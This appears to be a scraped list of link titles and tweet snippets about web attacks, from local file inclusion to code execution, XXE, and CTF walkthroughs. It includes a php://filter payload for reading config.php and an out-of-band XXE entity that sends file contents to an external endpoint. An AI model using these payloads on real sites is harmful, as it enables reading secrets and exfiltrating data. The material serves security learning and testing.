👇🏼 🐸 🕸️ Web security: from LFI to RCE 🍹 👨👨👦 👩🏿🎨
Local File Inclusion (LFI) Explained, Examples & How to Test
CTF7E4 - Web Challenges
PwnLab – init – The Cyber Jedi
Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ...
Jinwook Kim on Twitter: "Exploiting Out Of Band XXE using internal network and php wrappers <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/ resource=file:///D:/path/index.php"> ... exfil SYSTEM "http://target/endp. php?sid=[session_id]& ...
Adrian on Twitter: "Making use of an LFI vulnerability you can read the contents of any PHP file with this filter: http://example[.]com/index.php ?page=php://filter/read=convert.base64-encode/resource=config.php #LFI #LocalFileInclusion #Tip #Disclosure ...